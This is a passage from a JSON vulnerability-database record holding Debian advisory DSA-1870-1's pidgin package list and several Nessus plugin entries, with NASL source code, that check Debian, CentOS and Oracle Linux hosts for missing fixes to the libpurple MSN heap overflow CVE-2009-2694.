http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 5489632 53fed112a1e8642c0f682fc29f361a4a\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 1827630 14a3a37c121b1e13c031f8894c5f4f64\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_hppa.deb\n Size/MD5 checksum: 753796 d50a7d1ba32773f791872bce6305b92c\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 1584144 54aeb3d38dd0cae7e486dab84a82cbb8\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 680948 8144b0b957e103cedd0a617e37a3feae\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 326656 4d75eb89954a304b036d5f14e751f72a\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_i386.deb\n Size/MD5 checksum: 5374132 2640104cb54145afda5a685607a1e74c\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 5223582 02aa16c2f23681d9123f0fe35e3414fd\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 434672 fcc166e5359603ec5a02953f36b30e33\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 948114 38eb5dfe87ba4ffa01ace8cf7db745c4\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_ia64.deb\n Size/MD5 checksum: 2194278 82db59131767124c1cef53a9ef03de9e\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 5655702 d2694b5874bccdc4bde1a2debf2f1ad7\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 653944 c39d08c1fe964baa5c1ff533432f7c4d\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 1373212 9673d5480375e78dae3741b32615e112\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_mips.deb\n Size/MD5 checksum: 318262 aaff22798d1a88aa2d2e04b24b9a7932\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin-dbg_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 5579128 be3d6412d3c5f41344f2b6a5a8f39bfe\n http://security.debian.org/pool/updates/main/p/pidgin/pidgin_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 753872 81133dbb351067d2d3ef6bbc136c106f\n http://security.debian.org/pool/updates/main/p/pidgin/libpurple0_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 1760422 379017e7d47927678f6b404aa4d12936\n http://security.debian.org/pool/updates/main/p/pidgin/finch_2.4.3-4lenny3_powerpc.deb\n Size/MD5 checksum: 362944 f0cc1dea3b629fb34549d228599bd567\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2009-08-19T22:33:52", "published": "2009-08-19T22:33:52", "id": "DEBIAN:DSA-1870-1:14B64", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2009/msg00187.html", "title": "[SECURITY] [DSA 1870-1] New pidgin packages fix arbitrary code execution", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-06T09:45:37", "description": "Federico Muttis discovered that libpurple, the shared library that\nadds support for various instant messaging networks to the pidgin IM\nclient, is vulnerable to a heap-based buffer overflow. This issue\nexists because of an incomplete fix for CVE-2008-2927 and\nCVE-2009-1376. An attacker can exploit this by sending two consecutive\nSLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an\noffset of zero, the second packet then contains a crafted offset which\nhits the vulnerable code originally fixed in CVE-2008-2927 and\nCVE-2009-1376 and allows an attacker to execute arbitrary code.\n\nNote: Users with the 'Allow only the users below' setting are not\nvulnerable to this attack. If you can't install the below updates you\nmay want to set this via Tools->Privacy.", "edition": 27, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1870-1 : pidgin - insufficient input validation", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-2927", "CVE-2009-1376", "CVE-2009-2694"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:pidgin"], "id": "DEBIAN_DSA-1870.NASL", "href": "https://www.tenable.com/plugins/nessus/44735", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1870. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44735);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-2694\");\n script_bugtraq_id(36071);\n script_xref(name:\"DSA\", value:\"1870\");\n\n script_name(english:\"Debian DSA-1870-1 : pidgin - insufficient input validation\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Federico Muttis discovered that libpurple, the shared library that\nadds support for various instant messaging networks to the pidgin IM\nclient, is vulnerable to a heap-based buffer overflow. This issue\nexists because of an incomplete fix for CVE-2008-2927 and\nCVE-2009-1376. An attacker can exploit this by sending two consecutive\nSLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an\noffset of zero, the second packet then contains a crafted offset which\nhits the vulnerable code originally fixed in CVE-2008-2927 and\nCVE-2009-1376 and allows an attacker to execute arbitrary code.\n\nNote: Users with the 'Allow only the users below' setting are not\nvulnerable to this attack. If you can't install the below updates you\nmay want to set this via Tools->Privacy.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-2927\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2008-2927\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2009-1376\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1870\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the pidgin packages.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 2.4.3-4lenny3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"5.0\", prefix:\"finch\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"finch-dev\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-bin\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple-dev\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"libpurple0\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-data\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dbg\", reference:\"2.4.3-4lenny3\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"pidgin-dev\", reference:\"2.4.3-4lenny3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:25:52", "description": "Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.", "edition": 28, "published": "2009-08-20T00:00:00", "title": "CentOS 3 / 5 : pidgin (CESA-2009:1218)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2009-08-20T00:00:00", "cpe": ["p-cpe:/a:centos:centos:libpurple-tcl", "p-cpe:/a:centos:centos:pidgin-perl", "p-cpe:/a:centos:centos:finch-devel", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:finch", "p-cpe:/a:centos:centos:pidgin-devel", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:libpurple-perl", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/nessus/40625", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:1218 and \n# CentOS Errata and Security Advisory 2009:1218 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40625);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"CentOS 3 / 5 : pidgin (CESA-2009:1218)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-August/016099.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c82f2663\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-August/016100.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ea662c85\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-August/016101.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d207a51e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-August/016102.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f1000580\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 3.x / 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", cpu:\"i386\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", cpu:\"x86_64\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"finch-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-perl-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"libpurple-tcl-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-devel-2.5.9-1.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"pidgin-perl-2.5.9-1.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:44:41", "description": "From Red Hat Security Advisory 2009:1218 :\n\nUpdated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.", "edition": 26, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : pidgin (ELSA-2009-1218)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3025", "CVE-2009-1376", "CVE-2009-3026", "CVE-2009-2694"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:pidgin", "p-cpe:/a:oracle:linux:libpurple-devel", "p-cpe:/a:oracle:linux:finch", "p-cpe:/a:oracle:linux:pidgin-perl", "p-cpe:/a:oracle:linux:libpurple", "p-cpe:/a:oracle:linux:libpurple-tcl", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:finch-devel", "p-cpe:/a:oracle:linux:libpurple-perl", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:pidgin-devel"], "id": "ORACLELINUX_ELSA-2009-1218.NASL", "href": "https://www.tenable.com/plugins/nessus/67912", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:1218 and \n# Oracle Linux Security Advisory ELSA-2009-1218 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67912);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-1376\", \"CVE-2009-2694\", \"CVE-2009-3025\", \"CVE-2009-3026\");\n script_xref(name:\"RHSA\", value:\"2009:1218\");\n\n script_name(english:\"Oracle Linux 3 / 4 : pidgin (ELSA-2009-1218)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:1218 :\n\nUpdated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of changes:\nhttp://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which\nresolve this issue. Pidgin must be restarted for this update to take\neffect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-August/001125.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-August/001127.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected pidgin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_cwe_id(189, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:finch-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:libpurple-tcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:pidgin-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/05/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"pidgin-1.5.1-4.el3\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"finch-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"finch-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-perl-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"libpurple-tcl-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-devel-2.5.9-1.el4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"pidgin-perl-2.5.9-1.el4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"finch / finch-devel / libpurple / libpurple-devel / libpurple-perl / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:07:00", "description": "Updated pidgin packages that fix a security issue are now available\nfor Red Hat Enterprise Linux 3, 4, and 5.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in\nPidgin's MSN protocol handler. If a user received a malicious MSN\nmessage, it was possible to execute arbitrary code with the\npermissions of the user running Pidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages\nfrom users on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin\nrelease notes for a full list of 